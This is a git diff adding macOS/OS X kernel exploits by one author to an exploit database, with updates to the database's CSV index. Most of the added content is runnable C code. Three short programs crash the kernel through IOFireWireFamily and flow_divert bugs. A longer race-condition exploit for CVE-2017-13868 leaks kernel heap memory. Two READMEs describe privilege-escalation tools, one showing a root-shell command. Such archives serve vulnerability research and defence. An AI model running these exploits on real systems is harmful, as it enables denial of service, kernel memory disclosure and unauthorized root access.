diff --git a/exploits/macos/dos/44235.c b/exploits/macos/dos/44235.c new file mode 100644 index 000000000..1e785d26f --- /dev/null +++ b/exploits/macos/dos/44235.c @@ -0,0 +1,66 @@ +/* + * IOFireWireFamily-overflow.c + * Brandon Azad + * + * Buffer overflow reachable from IOFireWireUserClient::localConfigDirectory_Publish. + * + * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44235.zip +*/ + +#include +#include +#include + +int main() { + int ret = 0; + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOFireWireLocalNode")); + if (service == IO_OBJECT_NULL) { + ret = 1; + goto fail1; + } + io_connect_t connect; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect); + IOObjectRelease(service); + if (kr != KERN_SUCCESS) { + ret = 2; + goto fail1; + } + // localConfigDirectory_Create + uint64_t directory = 0; + uint32_t output_count = 1; + kr = IOConnectCallMethod(connect, 16, + NULL, 0, NULL, 0, + &directory, &output_count, NULL, NULL); + if (kr != KERN_SUCCESS) { + ret = 3; + goto fail2; + } + // localConfigDirectory_addEntry_Buffer + uint32_t size = 0x100000; + void *buffer = malloc(size); + memset(buffer, 0xaa, size); + uint64_t addEntry_Buffer_args[6] = { directory, 0, (uint64_t)buffer, size, 0, 0 }; + kr = IOConnectCallMethod(connect, 17, + addEntry_Buffer_args, + sizeof(addEntry_Buffer_args) / sizeof(*addEntry_Buffer_args), + NULL, 0, + NULL, NULL, NULL, NULL); + free(buffer); + if (kr != KERN_SUCCESS) { + ret = 4; + goto fail2; + } + // localConfigDirectory_Publish + kr = IOConnectCallMethod(connect, 21, + &directory, 1, NULL, 0, + NULL, NULL, NULL, NULL); + if (kr != KERN_SUCCESS) { + ret = 5; + goto fail2; + } +fail2: + IOServiceClose(connect); +fail1: + return ret; +} \ No newline at end of file diff --git a/exploits/macos/dos/44236.c b/exploits/macos/dos/44236.c new file mode 100644 index 000000000..9e9442c2c --- /dev/null +++ b/exploits/macos/dos/44236.c @@ -0,0 +1,51 @@ +/* + * IOFireWireFamily-null-deref.c + * Brandon Azad + * + * NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop. + * + * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44236.zip +*/ + + +#include + +int main() { + int ret = 0; + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOFireWireLocalNode")); + if (service == IO_OBJECT_NULL) { + ret = 1; + goto fail1; + } + io_connect_t connect; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect); + IOObjectRelease(service); + if (kr != KERN_SUCCESS) { + ret = 2; + goto fail1; + } + // isochChannel_Create + uint64_t args[3] = { 0, 0x100, 0x100 }; + uint64_t handle = 0; + uint32_t output_count = 1; + kr = IOConnectCallMethod(connect, 57, + args, sizeof(args) / sizeof(*args), NULL, 0, + &handle, &output_count, NULL, NULL); + if (kr != KERN_SUCCESS) { + ret = 3; + goto fail2; + } + // setAsyncRef_IsochChannelForceStop + kr = IOConnectCallMethod(connect, 90, + &handle, 1, NULL, 0, + NULL, NULL, NULL, NULL); + if (kr != KERN_SUCCESS) { + ret = 4; + goto fail2; + } +fail2: + IOServiceClose(connect); +fail1: + return ret; +} \ No newline at end of file diff --git a/exploits/macos/local/44234.c b/exploits/macos/local/44234.c new file mode 100644 index 000000000..d42b4a54f --- /dev/null +++ b/exploits/macos/local/44234.c @@ -0,0 +1,447 @@ +/* + * ctl_ctloutput-leak.c + * Brandon Azad + * + * CVE-2017-13868 + * + * While looking through the source code of XNU version 4570.1.46, I noticed that the function + * ctl_ctloutput() in the file bsd/kern/kern_control.c does not check the return value of + * sooptcopyin(), which makes it possible to leak the uninitialized contents of a kernel heap + * allocation to user space. Triggering this information leak requires root privileges. + * + * The ctl_ctloutput() function is called when a userspace program calls getsockopt(2) on a kernel + * control socket. The relevant code does the following: + * (a) It allocates a kernel heap buffer for the data parameter to getsockopt(), without + * specifying the M_ZERO flag to zero out the allocated bytes. + * (b) It copies in the getsockopt() data from userspace using sooptcopyin(), filling the data + * buffer just allocated. This copyin is supposed to completely overwrite the allocated data, + * which is why the M_ZERO flag was not needed. However, the return value of sooptcopyin() is + * not checked, which means it is possible that the copyin has failed, leaving uninitialized + * data in the buffer. The copyin could fail if, for example, the program passed an unmapped + * address to getsockopt(). + * (c) The code then calls the real getsockopt() implementation for this kernel control socket. + * This implementation should process the input buffer, possibly modifying it and shortening + * it, and return a result code. However, the implementation is free to assume that the + * supplied buffer has already been initialized (since theoretically it comes from user + * space), and hence several implementations don't modify the buffer at all. The NECP + * function necp_ctl_getopt(), for example, just returns 0 without processing the data buffer + * at all. + * (d) Finally, if the real getsockopt() implementation doesn't return an error, ctl_ctloutput() + * calls sooptcopyout() to copy the data buffer back to user space. + * + * Thus, by specifying an unmapped data address to getsockopt(2), we can cause a heap buffer of a + * controlled size to be allocated, prevent the contents of that buffer from being initialized, and + * then reach a call to sooptcopyout() that tries to write that buffer back to the unmapped + * address. All we need to do for the copyout to succeed is remap that address between the calls to + * sooptcopyin() and sooptcopyout(). If we can do that, then we will leak uninitialized kernel heap + * data to userspace. + * + * It turns out that this is a pretty easy race to win. While testing on my 2015 Macbook Pro, the + * mean number of attempts to win the race was never more than 600, and the median was never more + * than 5. (This testing was conducted with DEBUG off, since the printfs dramatically slow down the + * exploit.) + * + * This program exploits this vulnerability to leak data from a kernel heap buffer of a + * user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS + * High Sierra 10.13 (build 17A365). + * + * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44234.zip + * + */ +#if 0 + if (sopt->sopt_valsize && sopt->sopt_val) { + MALLOC(data, void *, sopt->sopt_valsize, M_TEMP, // (a) data is allocated + M_WAITOK); // without M_ZERO. + if (data == NULL) + return (ENOMEM); + /* + * 4108337 - copy user data in case the + * kernel control needs it + */ + error = sooptcopyin(sopt, data, // (b) sooptcopyin() is + sopt->sopt_valsize, sopt->sopt_valsize); // called to fill the + } // buffer; the return + len = sopt->sopt_valsize; // value is ignored. + socket_unlock(so, 0); + error = (*kctl->getopt)(kctl->kctlref, kcb->unit, // (c) The getsockopt() + kcb->userdata, sopt->sopt_name, // implementation is + data, &len); // called to process + if (data != NULL && len > sopt->sopt_valsize) // the buffer. + panic_plain("ctl_ctloutput: ctl %s returned " + "len (%lu) > sopt_valsize (%lu)\n", + kcb->kctl->name, len, + sopt->sopt_valsize); + socket_lock(so, 0); + if (error == 0) { + if (data != NULL) + error = sooptcopyout(sopt, data, len); // (d) If (c) succeeded, + else // then the data buffer + sopt->sopt_valsize = len; // is copied out to + } // userspace. +#endif + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#if __x86_64__ + +// ---- Header files not available on iOS --------------------------------------------------------- + +#include +#include +#include + +#else /* __x86_64__ */ + +// If we're not on x86_64, then we probably don't have access to the above headers. The following +// definitions are copied directly from the macOS header files. + +// ---- Definitions from mach/mach_vm.h ----------------------------------------------------------- + +extern +kern_return_t mach_vm_allocate +( + vm_map_t target, + mach_vm_address_t *address, + mach_vm_size_t size, + int flags +); + +extern +kern_return_t mach_vm_deallocate +( + vm_map_t target, + mach_vm_address_t address, + mach_vm_size_t size +); + +// ---- Definitions from sys/sys_domain.h --------------------------------------------------------- + +#define SYSPROTO_CONTROL 2 /* kernel control protocol */ + +#define AF_SYS_CONTROL 2 /* corresponding sub address type */ + +// ---- Definitions from sys/kern_control.h ------------------------------------------------------- + +#define CTLIOCGINFO _IOWR('N', 3, struct ctl_info) /* get id from name */ + +#define MAX_KCTL_NAME 96 + +struct ctl_info { + u_int32_t ctl_id; /* Kernel Controller ID */ + char ctl_name[MAX_KCTL_NAME]; /* Kernel Controller Name (a C string) */ +}; + +struct sockaddr_ctl { + u_char sc_len; /* depends on size of bundle ID string */ + u_char sc_family; /* AF_SYSTEM */ + u_int16_t ss_sysaddr; /* AF_SYS_KERNCONTROL */ + u_int32_t sc_id; /* Controller unique identifier */ + u_int32_t sc_unit; /* Developer private unit number */ + u_int32_t sc_reserved[5]; +}; + +#endif /* __x86_64__ */ + +// ---- Definitions from bsd/net/necp.h ----------------------------------------------------------- + +#define NECP_CONTROL_NAME "com.apple.net.necp_control" + +// ---- Macros ------------------------------------------------------------------------------------ + +#if DEBUG +#define DEBUG_TRACE(fmt, ...) printf(fmt"\n", ##__VA_ARGS__) +#else +#define DEBUG_TRACE(fmt, ...) +#endif + +#define ERROR(fmt, ...) printf("Error: "fmt"\n", ##__VA_ARGS__) + +// ---- Kernel heap infoleak ---------------------------------------------------------------------- + +// A callback block that will be called each time kernel data is leaked. leak_data and leak_size +// are the kernel data that was leaked and the size of the leak. This function should return true +// to finish and clean up, false to retry the leak. +typedef bool (^kernel_leak_callback_block)(const void *leak_data, size_t leak_size); + +// Open the control socket for com.apple.necp. Requires root privileges. +static bool open_necp_control_socket(int *necp_ctlfd) { + int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL); + if (ctlfd < 0) { + ERROR("Could not create a system control socket: errno %d", errno); + return false; + } + struct ctl_info ctlinfo = { .ctl_id = 0 }; + strncpy(ctlinfo.ctl_name, NECP_CONTROL_NAME, sizeof(ctlinfo.ctl_name)); + int err = ioctl(ctlfd, CTLIOCGINFO, &ctlinfo); + if (err) { + close(ctlfd); + ERROR("Could not retrieve the control ID number for %s: errno %d", + NECP_CONTROL_NAME, errno); + return false; + } + struct sockaddr_ctl addr = { + .sc_len = sizeof(addr), + .sc_family = AF_SYSTEM, + .ss_sysaddr = AF_SYS_CONTROL, + .sc_id = ctlinfo.ctl_id, // com.apple.necp + .sc_unit = 0, // Let the kernel pick the control unit. + }; + err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr)); + if (err) { + close(ctlfd); + ERROR("Could not connect to the NECP control system (ID %d) " + "unit %d: errno %d", addr.sc_id, addr.sc_unit, errno); + return false; + } + *necp_ctlfd = ctlfd; + return true; +} + +// Allocate a virtual memory region at the address pointed to by map_address. If map_address points +// to a NULL address, then the allocation is created at an arbitrary address which is stored in +// map_address on return. +static bool allocate_map_address(void **map_address, size_t map_size) { + mach_vm_address_t address = (mach_vm_address_t) *map_address; + bool get_address = (address == 0); + int flags = (get_address ? VM_FLAGS_ANYWHERE : VM_FLAGS_FIXED); + kern_return_t kr = mach_vm_allocate(mach_task_self(), &address, map_size, flags); + if (kr != KERN_SUCCESS) { + ERROR("Could not allocate virtual memory: mach_vm_allocate %d: %s", + kr, mach_error_string(kr)); + return false; + } + if (get_address) { + *map_address = (void *)address; + } + return true; +} + +// Deallocate the mapping created by allocate_map_address. +static void deallocate_map_address(void *map_address, size_t map_size) { + mach_vm_deallocate(mach_task_self(), (mach_vm_address_t) map_address, map_size); +} + +// Context for the map_address_racer thread. +struct map_address_racer_context { + pthread_t thread; + volatile bool running; + volatile bool deallocated; + volatile bool do_map; + volatile bool restart; + bool success; + void * address; + size_t size; +}; + +// The racer thread. This thread will repeatedly: (a) deallocate the address; (b) spin until do_map +// is true; (c) allocate the address; (d) spin until the main thread sets restart to true or +// running to false. If the thread encounters an internal error, it sets success to false and +// exits. +static void *map_address_racer(void *arg) { + struct map_address_racer_context *context = arg; + while (context->running) { + // Deallocate the address. + deallocate_map_address(context->address, context->size); + context->deallocated = true; + // Wait for do_map to become true. + while (!context->do_map) {} + context->do_map = false; + // Do a little bit of work so that the allocation is more likely to take place at + // the right time. + close(-1); + // Re-allocate the address. If this fails, abort. + bool success = allocate_map_address(&context->address, context->size); + if (!success) { + context->success = false; + break; + } + // Wait while we're still running and not told to restart. + while (context->running && !context->restart) {} + context->restart = false; + }; + return NULL; +} + +// Start the map_address_racer thread. +static bool start_map_address_racer(struct map_address_racer_context *context, size_t leak_size) { + // Allocate the initial block of memory, fixing the address. + context->address = NULL; + context->size = leak_size; + if (!allocate_map_address(&context->address, context->size)) { + goto fail_0; + } + // Start the racer thread. + context->running = true; + context->deallocated = false; + context->do_map = false; + context->restart = false; + context->success = true; + int err = pthread_create(&context->thread, NULL, map_address_racer, context); + if (err) { + ERROR("Could not create map_address_racer thread: errno %d", err); + goto fail_1; + } + return true; +fail_1: + deallocate_map_address(context->address, context->size); +fail_0: + return false; +} + +// Stop the map_address_racer thread. +static void stop_map_address_racer(struct map_address_racer_context *context) { + // Exit the thread. + context->running = false; + context->do_map = true; + pthread_join(context->thread, NULL); + // Deallocate the memory. + deallocate_map_address(context->address, context->size); +} + +// Try the NECP leak once. Returns true if the leak succeeded. +static bool try_necp_leak(int ctlfd, struct map_address_racer_context *context) { + socklen_t length = context->size; + // Wait for the map to be deallocated. + while (!context->deallocated) {}; + context->deallocated = false; + // Signal the racer to do the mapping. + context->do_map = true; + // Try to trigger the leak. + int err = getsockopt(ctlfd, SYSPROTO_CONTROL, 0, context->address, &length); + if (err) { + DEBUG_TRACE("Did not allocate in time"); + return false; + } + // Most of the time we end up here: allocating too early. If the first two words are both + // 0, then assume we didn't make the leak. We need the leak size to be at least 16 bytes. + uint64_t *data = context->address; + if (data[0] == 0 && data[1] == 0) { + return false; + } + // WOW! It worked! + return true; +} + +// Repeatedly try the NECP leak, until either we succeed or hit the maximum retry limit. +static bool try_necp_leak_repeat(int ctlfd, kernel_leak_callback_block kernel_leak_callback, + struct map_address_racer_context *context) { + const size_t MAX_TRIES = 10000000; + bool has_leaked = false; + for (size_t try = 1;; try++) { + // Try the leak once. + if (try_necp_leak(ctlfd, context)) { + DEBUG_TRACE("Triggered the leak after %zu %s!", try, + (try == 1 ? "try" : "tries")); + try = 0; + has_leaked = true; + // Give the leak to the callback, and finish if it says we're done. + if (kernel_leak_callback(context->address, context->size)) { + return true; + } + } + // If we haven't successfully leaked anything after MAX_TRIES attempts, give up. + if (!has_leaked && try >= MAX_TRIES) { + ERROR("Giving up after %zu unsuccessful leak attempts", try); + return false; + } + // Reset for another try. + context->restart = true; + } +} + +// Leak kernel heap data repeatedly until the callback function returns true. +static bool leak_kernel_heap(size_t leak_size, kernel_leak_callback_block kernel_leak_callback) { + const size_t MIN_LEAK_SIZE = 16; + bool success = false; + if (leak_size < MIN_LEAK_SIZE) { + ERROR("Target leak size too small; must be at least %zu bytes", MIN_LEAK_SIZE); + goto fail_0; + } + int ctlfd; + if (!open_necp_control_socket(&ctlfd)) { + goto fail_0; + } + struct map_address_racer_context context; + if (!start_map_address_racer(&context, leak_size)) { + goto fail_1; + } + if (!try_necp_leak_repeat(ctlfd, kernel_leak_callback, &context)) { + goto fail_2; + } + success = true; +fail_2: + stop_map_address_racer(&context); +fail_1: + close(ctlfd); +fail_0: + return success; +} + +// ---- Main -------------------------------------------------------------------------------------- + +// Dump data to stdout. +static void dump(const void *data, size_t size) { + const uint8_t *p = data; + const uint8_t *end = p + size; + unsigned off = 0; + while (p < end) { + printf("%06x: %02x", off & 0xffffff, *p++); + for (unsigned i = 1; i < 16 && p < end; i++) { + bool space = (i % 8) == 0; + printf(" %s%02x", (space ? " " : ""), *p++); + } + printf("\n"); + off += 16; + } +} + +int main(int argc, const char *argv[]) { + // Parse the arguments. + if (argc != 2) { + ERROR("Usage: %s ", argv[0]); + return 1; + } + char *end; + size_t leak_size = strtoul(argv[1], &end, 0); + if (*end != 0) { + ERROR("Invalid leak size '%s'", argv[1]); + return 1; + } + // Try to leak interesting data from the kernel. + const size_t MAX_TRIES = 50000; + __block size_t try = 1; + __block bool leaked = false; + bool success = leak_kernel_heap(leak_size, ^bool (const void *leak, size_t size) { + // Try to find an kernel pointer in the leak. + const uint64_t *p = leak; + for (size_t i = 0; i < size / sizeof(*p); i++) { + if (p[i] >> 48 == 0xffff) { + dump(leak, size); + leaked = true; + return true; + } + } +#if DEBUG + // Show this useless leak anyway. + DEBUG_TRACE("Boring leak:"); + dump(leak, size); +#endif + // If we've maxed out, just bail. + if (try >= MAX_TRIES) { + ERROR("Could not leak interesting data after %zu attempts", try); + return true; + } + try++; + return false; + }); + return (success && leaked ? 0 : 1); +} \ No newline at end of file diff --git a/exploits/macos/local/44237.md b/exploits/macos/local/44237.md new file mode 100644 index 000000000..152cce207 --- /dev/null +++ b/exploits/macos/local/44237.md @@ -0,0 +1,65 @@ +## physmem + + + +physmem is a physical memory inspection tool and local privilege escalation targeting macOS up +through 10.12.1. It exploits either [CVE-2016-1825] or [CVE-2016-7617] depending on the deployment +target. These two vulnerabilities are nearly identical, and exploitation can be done exactly the +same. They were patched in OS X El Capitan [10.11.5] and macOS Sierra [10.12.2], respectively. + +[CVE-2016-1825]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1825 +[CVE-2016-7617]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-7617 +[10.11.5]: https://support.apple.com/en-us/HT206567 +[10.12.2]: https://support.apple.com/en-us/HT207423 + +Because these are logic bugs, exploitation is incredibly reliable. I have not yet experienced a +panic in the tens of thousands of times I've run a program (correctly) exploiting these +vulnerabilities. + +### CVE-2016-1825 + +CVE-2016-1825 is an issue in IOHIDevice which allows setting arbitrary IOKit registry properties. +In particular, the privileged property IOUserClientClass can be controlled by an unprivileged +process. I have not tested platforms before Yosemite, but the vulnerability appears in the source +code as early as Mac OS X Leopard. + +### CVE-2016-7617 + +CVE-2016-7617 is an almost identical issue in AppleBroadcomBluetoothHostController. This +vulnerability appears to have been introduced in OS X El Capitan. It was reported by Ian Beer of +Google's Project Zero (issue [974]) and Radu Motspan. + +[974]: https://bugs.chromium.org/p/project-zero/issues/detail?id=974 + +### Building + +Build physmem by specifying your deployment target on the command line: + + $ make MACOSX_DEPLOYMENT_TARGET=10.10.5 + +### Running + +You can read a word of physical memory using the read command: + + $ ./physmem read 0x1000 + a69a04f2f59625b3 + +You can write to physical memory using the write command: + + $ ./physmem write 0x1000 0x1122334455667788 + $ ./physmem read 0x1000 + 1122334455667788 + +You can exec a root shell using the root command: + + $ ./physmem root + sh-3.2# whoami + root + +### License + +The physmem code is released into the public domain. As a courtesy I ask that if you reference or +use any of this code you attribute it to me. + + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44237.zip \ No newline at end of file diff --git a/exploits/osx/dos/44238.c b/exploits/osx/dos/44238.c new file mode 100644 index 000000000..5cff9dc33 --- /dev/null +++ b/exploits/osx/dos/44238.c @@ -0,0 +1,68 @@ +/* + * flow_divert-heap-overflow.c + * Brandon Azad + * + * CVE-2016-1827: Kernel heap overflow in the function flow_divert_handle_app_map_create on OS X + * and iOS. Exploitation requires root privileges. The vulnerability was patched in OS X El Capitan + * 10.11.5 and iOS 9.3.2. + * + * This proof-of-concept triggers a kernel panic on OS X Yosemite. In El Capitan the length fields + * were changed from 64 bits to 32 bits, so the message structure will need to be updated + * accordingly. This exploit has not been tested on iOS. + * + * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44238.zip + */ + +#include +#include +#include +#include +#include +#include + +int main() { + int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL); + if (ctlfd == -1) { + return 1; + } + struct ctl_info info = { .ctl_id = 0 }; + strncpy(info.ctl_name, "com.apple.flow-divert", sizeof(info.ctl_name)); + int err = ioctl(ctlfd, CTLIOCGINFO, &info); + if (err) { + return 2; + } + struct sockaddr_ctl addr = { + .sc_len = sizeof(addr), + .sc_family = AF_SYSTEM, + .ss_sysaddr = AF_SYS_CONTROL, + }; + addr.sc_id = info.ctl_id; + addr.sc_unit = 0; + err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr)); + if (err) { + return 3; + } + struct __attribute__((packed)) { + uint8_t type; + uint8_t pad1[3]; + uint32_t conn_id; + uint8_t prefix_count_tag; + uint64_t prefix_count_length; + int prefix_count; + uint8_t signing_id_tag; + uint64_t signing_id_length; + uint8_t signing_id[512 + 4]; + } message = { + .type = 9, + .conn_id = htonl(0), + .prefix_count_tag = 28, + .prefix_count_length = htonl(sizeof(int)), + .prefix_count = -2, + .signing_id_tag = 25, + .signing_id_length = htonl(sizeof(message.signing_id)), + .signing_id = { 0xaa }, + }; + write(ctlfd, &message, sizeof(message)); + close(ctlfd); + return 4; +} \ No newline at end of file diff --git a/exploits/osx/local/44239.md b/exploits/osx/local/44239.md new file mode 100644 index 000000000..b91b4cceb --- /dev/null +++ b/exploits/osx/local/44239.md @@ -0,0 +1,31 @@ +## rootsh + +rootsh is a local privilege escalation targeting OS X Yosemite 10.10.5 build +14F27. It exploits [CVE-2016-1758] and [CVE-2016-1828], two vulnerabilities in +XNU that were patched in OS X El Capitan [10.11.4] and [10.11.5]. rootsh will +not work on platforms with SMAP enabled. + +[CVE-2016-1758]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1758 +[CVE-2016-1828]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1828 +[10.11.4]: https://support.apple.com/en-us/HT206167 +[10.11.5]: https://support.apple.com/en-us/HT206567 + +### CVE-2016-1758 + +CVE-2016-1758 is an information leak caused by copying out uninitialized bytes +of kernel stack to user space. By comparing leaked kernel pointers with fixed +reference addresses it is possible to recover the kernel slide. + +### CVE-2016-1828 + +CVE-2016-1828 is a use-after-free during object deserialization. By passing a +crafted binary-serialized dictionary into the kernel, it is possible to trigger +a virtual method invocation on an object with a controlled vtable pointer. + +### License + +The rootsh code is released into the public domain. As a courtesy I ask that if +you use any of this code in another project you attribute it to me. + + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44239.zip \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8721c2edd..43000cc6b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5877,7 +5877,7 @@ id,file,description,date,author,type,platform,port 44182,exploits/linux/dos/44182.py,"Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060 44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060 44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060 -44189,exploits/windows/dos/44189.py,"Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows, +44189,exploits/windows/dos/44189.py,"Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows, 44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware, 44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64, 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64, @@ -5885,6 +5885,9 @@ id,file,description,date,author,type,platform,port 44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple, 44221,exploits/windows/dos/44221.py,"SEGGER embOS/IP FTP Server 3.22 - Denial of Service",2018-03-02,hyp3rlinx,dos,windows, 44222,exploits/windows/dos/44222.txt,"DualDesk 20 - 'Proxy.exe' Denial of Service",2018-03-02,hyp3rlinx,dos,windows, +44235,exploits/macos/dos/44235.c,"Apple macOS Sierra 10.12.1 - 'IOFireWireFamily' FireWire Port Denial of Service",2017-08-19,"Brandon Azad",dos,macos, +44238,exploits/osx/dos/44238.c,"Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic",2017-01-10,"Brandon Azad",dos,osx, +44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9337,7 +9340,7 @@ id,file,description,date,author,type,platform,port 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux, 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows, 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows, -43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'namedobj ' Kernel Loader",2017-12-27,Specter,local,hardware, +43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'NamedObj ' Kernel Loader",2017-12-27,Specter,local,hardware, 43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux, 43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows, 43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple, @@ -9560,6 +9563,9 @@ id,file,description,date,author,type,platform,port 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux, 44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware, 38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows, +44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos, +44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos, +44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16281,7 +16287,7 @@ id,file,description,date,author,type,platform,port 44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888 44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999 44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows, -44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' WebKit 5.01 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware, +44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' 'setAttributeNodeNS' WebKit 5.02 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware, 44226,exploits/php/remote/44226.txt,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution",2018-03-02,"Manish Tanwar",remote,php, 44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php, 44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,